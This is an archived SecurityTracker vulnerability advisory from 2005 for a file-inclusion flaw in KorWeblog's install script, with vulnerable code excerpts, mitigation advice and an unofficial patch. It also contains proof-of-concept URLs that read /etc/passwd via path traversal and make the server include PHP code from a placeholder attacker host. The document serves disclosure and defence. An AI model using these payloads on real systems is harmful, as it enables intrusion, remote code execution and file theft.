SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


Try our Premium Alert Service
 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service





Category:   Application (Forum/Board/Portal)  >   KorWeblog Vendors:   KorWeblog
KorWeblog 'install/index.php' Include File Flaw Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1012745
SecurityTracker URL:  http://securitytracker.com/id/1012745
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jan 1 2005
Impact:   Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.6.2-cvs and prior versions
Description:   Mins at FSU reported some input validation vulnerabilities in KorWeblog. A remote user can execute arbitrary commands on the target system.

The '/install/index.php' script does not properly validate the user-supplied 'lng' parameter. A remote user can create a specially crafted URL to cause the target server to include and execute arbitrary PHP code located on a remote server. The PHP code, including operating system commands, will run with the privileges of the target web service.

A remote user can also view files on the target system.

Some demonstration exploit URLs are provided:

http://[target]/weblog/install/index.php?lng=../../../../../../etc/passwd%00

http://[target]/weblog/install/index.php?lng=../../phpinfo

http://[target]/weblog/install/index.php?lng=../../include/main.inc&G_PATH=http://[attacker]

The vendor was notified on December 26, 2004 without response.

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.

A remote user can view files on the target system with the privileges of the target web service.

Solution:   No vendor solution was available at the time of this entry.

The author of the report has provided the following unofficial patch:

--- index_1_6_1.php Mon Dec 27 17:31:50 2004
+++ index.php Mon Dec 27 17:40:51 2004
@@ -18,7 +18,10 @@

$G_VER = "1.6.1";

-if (!empty($lng)) include("lang/$lng" . ".php");
+if (!empty($lng)) {
+ if (eregi("\.\.",$lng) || eregi("/",$lng)) $lng="korean";
+ include("lang/$lng" . ".php");
+}

$sql_form ="<P>
<TABLE><TR><TD COLSPAN=2><B>". _SQL_INPUT ."</B></TD>

Vendor URL:  weblog.kldp.org/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  KorWeblog php injection Vulnerability


KorWeblog php injection Vulnerability

Release Date : 2004/12/31 (KST)
Last Modified : 2005/01/01 (KST)
Author : Mins (mins at fsu.or.kr)
Product : KorWeblog http://weblog.kldp.org
Vendor-Status: Vendor was contacted but I could not receive reply message.
Vendor-Patches: None
Impact: Attacker can execute arbitrary php code.


Summary
=======
KorWeblog is one of popular blog system in Korea.
The "lng" parameter in "/install/index.php" isn't properly verified, before it is used to include files.
And Attacker does not need "register_globals=On".
So this vulnerability would allow remote user to inject php codes.


Affected Products
=================
korweblog 1.6.2-cvs and prior

- 1st case
php.ini : magic_quotes_gpc = Off

- 2nd case
php.ini : magic_quotes_gpc = On

- 3rd case
php.ini : allow_url_fopen = On


Vendor Status : NOT FIXED
=========================
2004-12-23 Vulnerability found
2004-12-26 Notified vendor.
2004-12-27 Could not receive reply message.
2004-12-27 Mins made temporary patch.
2004-12-29 2nd vendor Contact.
2004-12-30 Release of unoffical patch.
2004-12-31 Offical advisory release.


Details
=======
If "/install/index.php" exists, attacker can execute arbitrary php code.

Part of weak source (/install/index.php)
----
ini_set('magic_quotes_gpc',1);
ini_set('magic_quotes_sybase',0);

include("../include/misc.inc.php");
include("../include/sql.inc.php");
include("include/check.inc.php");

if(!ini_get("register_globals")) {
      include("include/grab_globals.inc.php");
      }

      $url = eregi_replace("(/install/|/install)$","",F_GetBaseURL());
      $path = eregi_replace("(/install/|/install)$","",dirname($_SERVER['SCRIPT_FILENAME']));

      $G_VER = "1.6.2";

      if (!empty($lng)) include("lang/$lng" . ".php");

Keep in mind that the setting magic_quotes_gpc will not work at runtime.
When the "magic_quotes_gpc" is 'Off', attacker can add '%00' to '$lng'.

However if "magic_quotes_gpc" is 'On', attacker can open only '.php' file.
That's right. But attacker is able to use another file.

Part of another same package source (/include/main.inc.php)
----
if (eregi("main.inc.php", $_SERVER['PHP_SELF']))
   die ("You can not access this file directly...");

set_magic_quotes_runtime(0);
ini_set('magic_quotes_gpc',1);
ini_set('magic_quotes_sybase',0);

include("$G_PATH/include/sql.inc.php");
include("$G_PATH/include/layout.inc.php");
include("$G_PATH/include/parser.inc.php");


Proof of Concepts
=================

- 1st case
php.ini : magic_quotes_gpc = Off
http://[victim]/weblog/install/index.php?lng=../../../../../../etc/passwd%00

- 2nd case
php.ini : magic_quotes_gpc = On
http://[victim]/weblog/install/index.php?lng=../../phpinfo

- 3rd case
php.ini : allow_url_fopen = On
http://[victim]/weblog/install/index.php?lng=../../include/main.inc&G_PATH=http://[hacker]

Solution
========
- remove the install file

- Set "allow_url_fopen" to "Off".

- unoffical patch
mins@hackme:~/public_html/korweblog-1.6.1/install$ cat index.diff
--- index_1_6_1.php     Mon Dec 27 17:31:50 2004
+++ index.php   Mon Dec 27 17:40:51 2004
@@ -18,7 +18,10 @@

 $G_VER = "1.6.1";

-if (!empty($lng)) include("lang/$lng" . ".php");
+if (!empty($lng)) {
+       if (eregi("\.\.",$lng) || eregi("/",$lng)) $lng="korean";
+       include("lang/$lng" . ".php");
+}

 $sql_form ="<P>
        <TABLE><TR><TD COLSPAN=2><B>". _SQL_INPUT ."</B></TD>

Credits
=======
Mins at FSU (mins at fsu.or.kr)
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2018, SecurityGlobal.net LLC